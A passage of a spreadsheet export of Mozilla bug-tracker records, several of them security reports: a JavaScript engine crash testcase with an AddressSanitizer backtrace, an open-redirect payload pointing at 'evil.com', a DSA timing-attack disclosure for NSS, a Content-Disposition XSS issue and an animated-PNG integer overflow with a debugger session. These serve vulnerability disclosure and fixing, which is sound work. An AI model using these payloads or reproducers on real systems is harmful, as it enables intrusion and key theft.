      </c>
      <c r="U1680" t="n">
        <v>0</v>
      </c>
      <c r="V1680" t="n">
        <v>22</v>
      </c>
      <c r="W1680" t="inlineStr">
        <is>
          <t>Created attachment 8949513
Test HTML page that reproduces the problem. Edit the server URL to point to a websockets endpoint. Then pick a small text file to send. Debugging messages are displayed to the console.
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20180205211730
Steps to reproduce:
Sent a websocket message that was composed of text and binary data concatenated into a single blob. To see the problem, text data must be before the binary data.
Actual results:
On Firefox 58+, the binary data gets corrupted. If you open the attached HTML file, and pick a file.  The websocket message that gets sent looks like this:
&lt;header&gt;ееееееееееееееееее
"&lt;header&gt;" is the text part of the message. "eeeeeeee...." is the binary data that should be the content of the file. Each binary byte has been replaced by an "e".
Expected results:
On earlier versions of Firefox (&lt;58) and other browsers (IE &amp; Chrome) the websocket message looks like this:
&lt;header&gt;text file content.</t>
        </is>
      </c>
      <c r="X1680" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" t="n">
        <v>522374</v>
      </c>
      <c r="B1681" t="inlineStr">
        <is>
          <t>2009-10-14 16:03:45 -0700</t>
        </is>
      </c>
      <c r="C1681" t="inlineStr">
        <is>
          <t>"ASSERTION: Creating ContinuingTextFrame, but there is no more content" with image map, bidi</t>
        </is>
      </c>
      <c r="D1681" t="inlineStr">
        <is>
          <t>2010-04-06 17:15:26 -0700</t>
        </is>
      </c>
      <c r="E1681" t="n">
        <v>1</v>
      </c>
      <c r="F1681" t="n">
        <v>1</v>
      </c>
      <c r="G1681" t="n">
        <v>3</v>
      </c>
      <c r="H1681" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1681" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1681" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1681" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1681" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1681" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1681" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1681" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1681" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1681" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1681" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T1681" t="n">
        <v>1</v>
      </c>
      <c r="U1681" t="n">
        <v>0</v>
      </c>
      <c r="V1681" t="n">
        <v>18</v>
      </c>
      <c r="W1681" t="inlineStr">
        <is>
          <t>Created attachment 406335
testcase
This testcase triggers
###!!! ASSERTION: Creating ContinuingTextFrame, but there is no more content: 'mContentOffset &lt; PRInt32(GetFragment()-&gt;GetLength())', file /Users/jruderman/central/layout/generic/nsTextFrameThebes.cpp, line 3518
and a bundle of other assertions.</t>
        </is>
      </c>
      <c r="X1681" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" t="n">
        <v>1434384</v>
      </c>
      <c r="B1682" t="inlineStr">
        <is>
          <t>2018-01-30 11:04:41 -0800</t>
        </is>
      </c>
      <c r="C1682" t="inlineStr">
        <is>
          <t>AddressSanitizer: BUS on unknown address 0x000000000000 [@ __asan::asan_free] with clobbered bp involving StructuredClone</t>
        </is>
      </c>
      <c r="D1682" t="inlineStr">
        <is>
          <t>2021-10-06 11:49:56 -0700</t>
        </is>
      </c>
      <c r="E1682" t="n">
        <v>1</v>
      </c>
      <c r="F1682" t="n">
        <v>1</v>
      </c>
      <c r="G1682" t="n">
        <v>3</v>
      </c>
      <c r="H1682" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1682" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1682" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1682" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1682" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1682" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1682" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1682" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1682" t="inlineStr">
        <is>
          <t>[adv-main59+][adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q1682" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1682" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1682" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T1682" t="n">
        <v>1</v>
      </c>
      <c r="U1682" t="n">
        <v>0</v>
      </c>
      <c r="V1682" t="n">
        <v>16</v>
      </c>
      <c r="W1682" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 8a2584063e19+ (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --enable-tests --enable-address-sanitizer --disable-jemalloc --enable-optimize=-O2 --enable-fuzzing --disable-debug, run with --fuzzing-safe):
let data = new Uint8Array([
  0x0,0x0,0x0,0x0,0x0,0x2,0xff,0xff,0x0,0x0,0x0,0x0,0x0,0x0,0x4,0x0,0x2,0x0,
  0x0,0x0,0x2,0x2,0xff,0xff,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x20,0x0,0x0,0x0,0x0,
  0x0,0x0,0x0,0x0
]);
let cloneBuffer = serialize(null);
cloneBuffer.clonebuffer = data.buffer;
try {
  let obj = deserialize(cloneBuffer);
  print(uneval(obj));
} catch(exc1) { print(exc1); }
Backtrace:
==15174==ERROR: AddressSanitizer: BUS on unknown address 0x000000000000 (pc 0x00000046a7ef bp 0x20003ffffffffff0 sp 0x7ffe32e839a0 T0)
    #0 0x46a7ee in __asan::asan_free(void*, __sanitizer::BufferedStackTrace*, __asan::AllocType) (js/src/opt64lf/js/src/shell/js+0x46a7ee)
    #1 0x52129c in __interceptor_cfree.localalias.0 (js/src/opt64lf/js/src/shell/js+0x52129c)
    #2 0x15a622d in js::Class::doFinalize(js::FreeOp*, JSObject*) const js/src/opt64lf/dist/include/js/Class.h:874:5
    #3 0x15a622d in JSObject::finalize(js::FreeOp*) js/src/jsobjinlines.h:108
    #4 0x15a622d in unsigned long js::gc::Arena::finalize&lt;JSObject&gt;(js::FreeOp*, js::gc::AllocKind, unsigned long) js/src/jsgc.cpp:552
    #5 0x158ac45 in bool FinalizeTypedArenas&lt;JSObject&gt;(js::FreeOp*, js::gc::Arena**, js::gc::SortedArenaList&amp;, js::gc::AllocKind, js::SliceBudget&amp;, js::gc::ArenaLists::KeepArenasEnum) js/src/jsgc.cpp:610:33
    #6 0x151f3b8 in FinalizeArenas(js::FreeOp*, js::gc::Arena**, js::gc::SortedArenaList&amp;, js::gc::AllocKind, js::SliceBudget&amp;, js::gc::ArenaLists::KeepArenasEnum) js/src/jsgc.cpp:644:1
    #7 0x151c325 in js::gc::ArenaLists::backgroundFinalize(js::FreeOp*, js::gc::Arena*, js::gc::Arena**) js/src/jsgc.cpp:3041:5
    #8 0x1527b6e in js::gc::GCRuntime::sweepBackgroundThings(js::gc::ZoneList&amp;, js::LifoAlloc&amp;) js/src/jsgc.cpp:3434:21
    #9 0x154b70b in js::gc::GCRuntime::endSweepingSweepGroup(js::FreeOp*, js::SliceBudget&amp;) js/src/jsgc.cpp:5671:9
    #10 0x15c39bc in sweepaction::SweepActionSequence&lt;js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&amp;&gt;::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&amp;) js/src/jsgc.cpp:6202:29
    #11 0x15c493e in sweepaction::SweepActionRepeatFor&lt;js::gc::SweepGroupsIter, JSRuntime*, js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&amp;&gt;::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&amp;) js/src/jsgc.cpp:6263:25
    #12 0x1551527 in js::gc::GCRuntime::performSweepActions(js::SliceBudget&amp;, js::AutoLockForExclusiveAccess&amp;) js/src/jsgc.cpp:6418:26
    #13 0x15588d5 in js::gc::GCRuntime::incrementalCollectSlice(js::SliceBudget&amp;, JS::gcreason::Reason, js::AutoLockForExclusiveAccess&amp;) js/src/jsgc.cpp:6980:13
    #14 0x155c56a in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget&amp;, JS::gcreason::Reason) js/src/jsgc.cpp:7317:5
    #15 0x1560255 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) js/src/jsgc.cpp:7460:25
    #16 0x1525368 in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:7530:5
[...]
Another crash where the base pointer looks clobbered, so this might again be easily exploitable if it can be triggered by a child process. Marking sec-high due to potential sandbox escape.</t>
        </is>
      </c>
      <c r="X1682" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" t="n">
        <v>1694684</v>
      </c>
      <c r="B1683" t="inlineStr">
        <is>
          <t>2021-02-24 07:46:04 -0800</t>
        </is>
      </c>
      <c r="C1683" t="inlineStr">
        <is>
          <t>open redirect in [pollbot.services.mozilla.com]</t>
        </is>
      </c>
      <c r="D1683" t="inlineStr">
        <is>
          <t>2024-05-30 10:28:05 -0700</t>
        </is>
      </c>
      <c r="E1683" t="n">
        <v>1</v>
      </c>
      <c r="F1683" t="n">
        <v>1</v>
      </c>
      <c r="G1683" t="n">
        <v>5</v>
      </c>
      <c r="H1683" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1683" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1683" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1683" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1683" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1683" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1683" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1683" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form]</t>
        </is>
      </c>
      <c r="Q1683" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1683" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1683" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1683" t="n">
        <v>0</v>
      </c>
      <c r="U1683" t="n">
        <v>0</v>
      </c>
      <c r="V1683" t="n">
        <v>14</v>
      </c>
      <c r="W1683" t="inlineStr">
        <is>
          <t>Summary:
There is an open redirection vulnerability in the path of:
https://pollbot.services.mozilla.com/
Description:
An attacker can redirect anyone to malicious sites.
Steps To Reproduce:
Type in this URL:
https://pollbot.services.mozilla.com//evil.com/
As, you can see it redirects to that website when you inject this payload:
//evil.com/
evil.com was used as an example but this could be any website note, the // is the bypass.
Supporting Material/References:
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
Impact
Attackers can serve malicious websites that steal passwords or download ransomware to their victims machine due to a redirect and there are a heap of other attack vectors.</t>
        </is>
      </c>
      <c r="X1683" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" t="n">
        <v>162134</v>
      </c>
      <c r="B1684" t="inlineStr">
        <is>
          <t>2002-08-10 21:17:06 -0700</t>
        </is>
      </c>
      <c r="C1684" t="inlineStr">
        <is>
          <t>[OSX] Java applets draw on wrong tabs</t>
        </is>
      </c>
      <c r="D1684" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1684" t="n">
        <v>1</v>
      </c>
      <c r="F1684" t="n">
        <v>1</v>
      </c>
      <c r="G1684" t="n">
        <v>6</v>
      </c>
      <c r="H1684" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1684" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1684" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1684" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1684" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1684" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1684" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1684" t="inlineStr">
        <is>
          <t>WONTFIX</t>
        </is>
      </c>
      <c r="P1684" t="inlineStr">
        <is>
          <t>[sg:spoof][adt1][need info][ETA: vendor update]</t>
        </is>
      </c>
      <c r="Q1684" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1684" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1684" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T1684" t="n">
        <v>1</v>
      </c>
      <c r="U1684" t="n">
        <v>50</v>
      </c>
      <c r="V1684" t="n">
        <v>281</v>
      </c>
      <c r="W1684" t="inlineStr">
        <is>
          <t>steps to reproduce:
use the new version of OSX
remove MRJPluginCarbon.plugin from the bundle
go to above URL
load a page, this bug for instance
open the URL listed on this bug in a new tab, I did it with command-click
wait for the java applet to load and start exclaiming its exciting news
switch back to the first tab
expected results:
java applet stays on its own dang tab
actual results:
java applet draws all over any other tab in the same window
kit:
6C115, Moz 2002072308 (1.1b), pismo 400</t>
        </is>
      </c>
      <c r="X1684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" t="n">
        <v>1631576</v>
      </c>
      <c r="B1685" t="inlineStr">
        <is>
          <t>2020-04-20 12:51:20 -0700</t>
        </is>
      </c>
      <c r="C1685" t="inlineStr">
        <is>
          <t>Timing attack on DSA on NSS library</t>
        </is>
      </c>
      <c r="D1685" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:36 -0800</t>
        </is>
      </c>
      <c r="E1685" t="n">
        <v>1</v>
      </c>
      <c r="F1685" t="n">
        <v>1</v>
      </c>
      <c r="G1685" t="n">
        <v>3</v>
      </c>
      <c r="H1685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1685" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1685" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1685" t="inlineStr">
        <is>
          <t>3.52</t>
        </is>
      </c>
      <c r="L1685" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1685" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1685" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1685" t="inlineStr">
        <is>
          <t>[disclosure date 2020-06-02][RedHat INC1266622][post-critsmash-triage][adv-main77+][adv-esr68.9+][sec-survey]</t>
        </is>
      </c>
      <c r="Q1685" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1685" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1685" t="inlineStr">
        <is>
          <t>3.52</t>
        </is>
      </c>
      <c r="T1685" t="n">
        <v>1</v>
      </c>
      <c r="U1685" t="n">
        <v>0</v>
      </c>
      <c r="V1685" t="n">
        <v>28</v>
      </c>
      <c r="W1685" t="inlineStr">
        <is>
          <t>Created attachment 9141833
timings.pdf
[filed from mail to security@ from Cesar Pereida Garcia]
Dear NSS and Red Hat folks,
We are a team of security researchers in Finland and we would like to report a vulnerability affecting the DSA signature generation path in NSS. 
The vulnerability leaks enough information to recover DSA private keys via a timing attack and a lattice calculation.
### Timing attack strikes once more ###
Affecting NSS latests branch.
This attack draws inspiration from the attacks presented in [1] and [2].
During DSA signature generation in the function `dsa_SignDigest`, the nonce value `k` is not padded, exposing the bit length of `k`,
i.e. the most significant bits (MSBs) of the nonce.
Similar to [1], the regularity of the modular exponentiation function `mp_exptmod_safe_i` processing the nonce, amplifies and improves the
timing resolution, allowing to clearly distinguish the time it takes to generate a signature, and therefore leaking the MSBs.
Moreover, due to the windowed approach used by the modular exponentiation algorithm, nonce bits are processed in windows of 4 bits,
thus the leakage occurs in multiples of 4 bits.
An attacker can measure the time it takes to compute a DSA signature and then based on the time, catalog in buckets.
The attacker can label each bucket with length `n - (4 * i)` bits, where `n` is the length of the DSA private key, and `i` is the amount
of windows skipped by the algorithm due to smaller nonce length.
The attached figure shows experimental results with a DSA key generated with default parameters using the `certutil` tool, i.e. 2048-bit DSA with
a 224-bit private key length. As can be appreciated, the timing difference is clearly marked, allowing to easily categorize signatures in each bucket
to then proceed with the lattice calculation to finally recover the private key.
### Vulnerable applications ###
This vulnerability can be exploited by any application performing DSA signatures and using NSS as the cryptography library.
We include Red Hat folks in the loop as they very likely have several tools and applications linking to NSS to perform DSA operations.
### Countermeasure ###
We recommend padding the nonce `k` value to be of fixed length, similar to the work by [1], resulting in no leakage by the modular exponentiation
function.
We can help develop and/or test the patch, according to your needs, please let us know how would you like to proceed.
### Disclosure ###
We aim a public disclosure of our findings on May 18 (~1 month from today). We appreciate if you could take a look at this issue at your earliest
convenience.
### References ###
[1] Billy Bob Brumley and Nicola Tuveri. “Remote Timing Attacks Are Still Practical”. In Computer Security - ESORICS 2011.
[2] Cesar Pereida, Billy Bob Brumley, and Yuval Yarom. "Make sure DSA signing exponentiations really are constant-time". In 23rd CCS, 2016.
Thanks for your time reviewing this vulnerability.
Regards,
Cesar Pereida Garcia
Doctoral Researcher
Network and Information Security Group (NISEC)
Tampere University</t>
        </is>
      </c>
      <c r="X1685" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" t="n">
        <v>823984</v>
      </c>
      <c r="B1686" t="inlineStr">
        <is>
          <t>2012-12-21 09:47:44 -0800</t>
        </is>
      </c>
      <c r="C1686" t="inlineStr">
        <is>
          <t>The Frolic Project</t>
        </is>
      </c>
      <c r="D1686" t="inlineStr">
        <is>
          <t>2013-01-02 11:16:18 -0800</t>
        </is>
      </c>
      <c r="E1686" t="n">
        <v>1</v>
      </c>
      <c r="F1686" t="n">
        <v>1</v>
      </c>
      <c r="G1686" t="n">
        <v>6</v>
      </c>
      <c r="H1686" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1686" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1686" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1686" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1686" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1686" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1686" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1686" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1686" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q1686" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1686" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1686" t="inlineStr">
        <is>
          <t>2012-12-27</t>
        </is>
      </c>
      <c r="T1686" t="n">
        <v>1</v>
      </c>
      <c r="U1686" t="n">
        <v>0</v>
      </c>
      <c r="V1686" t="n">
        <v>4</v>
      </c>
      <c r="W1686" t="inlineStr">
        <is>
          <t>This comment intentionally left blank.</t>
        </is>
      </c>
      <c r="X1686" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" t="n">
        <v>537120</v>
      </c>
      <c r="B1687" t="inlineStr">
        <is>
          <t>2009-12-29 10:15:03 -0800</t>
        </is>
      </c>
      <c r="C1687" t="inlineStr">
        <is>
          <t>Content-Disposition: attachment ignored if Content-Type: multipart also present</t>
        </is>
      </c>
      <c r="D1687" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E1687" t="n">
        <v>1</v>
      </c>
      <c r="F1687" t="n">
        <v>1</v>
      </c>
      <c r="G1687" t="n">
        <v>6</v>
      </c>
      <c r="H1687" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1687" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1687" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1687" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1687" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1687" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1687" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1687" t="inlineStr">
        <is>
          <t>[sg:moderate][xss against sites who allow users to set C-T but who rely on C-D: attachment for protection]</t>
        </is>
      </c>
      <c r="Q1687" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1687" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1687" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T1687" t="n">
        <v>1</v>
      </c>
      <c r="U1687" t="n">
        <v>0</v>
      </c>
      <c r="V1687" t="n">
        <v>25</v>
      </c>
      <c r="W1687" t="inlineStr">
        <is>
          <t>Created attachment 419432
testcase (load from mod_php server)
Ilja van Sprundel from IOActive reported this issue to security@m.o.
When we receive both a C-D:attachment and a C-T:multipart header, we follow the C-T header and display the content inline.  This could potentially lead to XSS if a site lets users specify Content-Type for a file but rely on C-D to serve the file as an attachment.  Apparently, other browsers honor the C-D header.  I tested in Chromium and that is the case.
(filing as sec-sensitive for now)
-------
Hey Guys, 
There's a small security bug in FF that would allow files that are offered as a download to be rendered as inline html instead: 
If Content-Disposition is set to attachment, but content-type is set to multipart (attacker controlled),then the content-disposition is ignored, and the content is seen as a mime header.if that mime header defines a content-type of text/html then it will be rendered inline. 
This allows for XSS on some webapplications. specifically webapplications that allow an attacker to upload a file, and set it's content-type, but where the webapp sets the content disposition to attachment, trying to force the user to download the file, instead of rendering the content inline (this is actually quite common, e.g. a webmail application, webapp allowing users to upload and download files, ...). 
Firefox appears to be the only browser that does this. IE, chrome and safari will honor the content-disposition and just offer it as a download. testes both on FF 3.0 and and 3.5. 
Regards,
Ilja van Sprundel.</t>
        </is>
      </c>
      <c r="X1687" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" t="n">
        <v>443693</v>
      </c>
      <c r="B1688" t="inlineStr">
        <is>
          <t>2008-07-04 22:50:53 -0700</t>
        </is>
      </c>
      <c r="C1688" t="inlineStr">
        <is>
          <t>Integer overflow in info_callback() processing animated PNG</t>
        </is>
      </c>
      <c r="D1688" t="inlineStr">
        <is>
          <t>2009-02-17 13:49:02 -0800</t>
        </is>
      </c>
      <c r="E1688" t="n">
        <v>1</v>
      </c>
      <c r="F1688" t="n">
        <v>1</v>
      </c>
      <c r="G1688" t="n">
        <v>3</v>
      </c>
      <c r="H1688" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1688" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1688" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1688" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1688" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1688" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1688" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1688" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1688" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1688" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1688" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1688" t="n">
        <v>1</v>
      </c>
      <c r="U1688" t="n">
        <v>0</v>
      </c>
      <c r="V1688" t="n">
        <v>24</v>
      </c>
      <c r="W1688" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0
Integer overflows in info_callback() processing animated PNG
There are 2 integer overflows leading to heap buffer overflows in info_callback() in nsPNGDecoder.cpp.  I believe it's only exploitable when parsing APNGs, so I think this only affects FF3.  I have not looked at the code for FF 2.  I'm guessing this might affect Thunderbird, but I haven't checked.  Please credit Drew Yao of Apple Product Security.
in info_callback():
  if (png_get_first_frame_is_hidden(png_ptr, info_ptr)) {
    decoder-&gt;mFrameIsHidden = PR_TRUE;
  } else {
    decoder-&gt;CreateFrame(0, 0, width, height, decoder-&gt;format);
  }
  if (decoder-&gt;mTransform &amp;&amp;
      (channels &lt;= 2 || interlace_type == PNG_INTERLACE_ADAM7)) {
    PRUint32 bpp[] = { 0, 3, 4, 3, 4 };
    decoder-&gt;mCMSLine =
      (PRUint8 *)nsMemory::Alloc(bpp[channels] * width);
    if (!decoder-&gt;mCMSLine)
      longjmp(decoder-&gt;mPNG-&gt;jmpbuf, 5); // NS_ERROR_OUT_OF_MEMORY
  }
  if (interlace_type == PNG_INTERLACE_ADAM7) {
    decoder-&gt;interlacebuf = (PRUint8 *)nsMemory::Alloc(channels * width * height);
Both of the Allocs can overflow to an unexpectedly small number, leading to a buffer overflow later.  The reason I think this can only be triggered by a APNG is that if png_get_first_frame_is_hidden() is false, decoder-&gt;CreateFrame will get called.  That leads to gfxASurface::CheckSurfaceSize getting called, which checks if height * width would overflow.  To avoid this check the attacker needs to use an APNG with the first fcTL chunk missing, which causes png_get_first_frame_is_hidden() to be true.
When you run the attached test case png file, Firefox will crash.  Sometimes it might be a null deref.  I can demonstrate that the integer overflow occurs, leading to a heap buffer overflow, using libgmalloc(3) on Mac OS X.  libgmalloc places a guard page immediately after each heap allocation, causing a crash when you write past the end of it.
(gdb) set env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
(gdb) b nsPNGDecoder.cpp:648 if png_ptr-&gt;apng_flags == 1
(gdb) run
Breakpoint 1, info_callback (png_ptr=0x56ddde00, info_ptr=0x56de7f60) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:648
648	  if (decoder-&gt;mTransform &amp;&amp;
(gdb) n
Current language:  auto; currently c++
657	  if (interlace_type == PNG_INTERLACE_ADAM7) {
(gdb) n
658	    decoder-&gt;interlacebuf = (PRUint8 *)nsMemory::Alloc(channels * width * height);
(gdb) p channels
$1 = 4
(gdb) p/x width
$2 = 0x8000
(gdb) p/x height
$3 = 0x8000
(gdb) p/x channels*width*height
$4 = 0x0
#overflow causes a 0-size buffer to be allocated
(gdb) n
(gdb) p decoder-&gt;interlacebuf
$11 = (PRUint8 *) 0x5700bff0 ""
(gdb) c
Continuing.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x5700c000
0x13480cd4 in MOZ_PNG_combine_row (png_ptr=0x56ddde00, row=0x5700bff0 "", mask=255) at /Volumes/data_apps/mozilla/modules/libimg/png/pngrutil.c:2472
2472	      png_memcpy(row, png_ptr-&gt;row_buf + 1,
(gdb) p row
$12 = (png_bytep) 0x5700bff0 ""
#The destination pointer for this memcpy, is the 0-size buffer which was allocated earlier.
(gdb) bt
#0  0x13463cd4 in MOZ_PNG_combine_row (png_ptr=0x5305de00, row=0x5328dff0 "", mask=255) at /Volumes/data_apps/mozilla/modules/libimg/png/pngrutil.c:2472
#1  0x13460f5d in MOZ_PNG_progressive_combine_row (png_ptr=0x5305de00, old_row=0x5328dff0 "", new_row=0x5306ffd1 "") at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1746
#2  0x134361fc in row_callback (png_ptr=0x5305de00, new_row=0x5306ffd1 "", row_num=0, pass=0) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:715
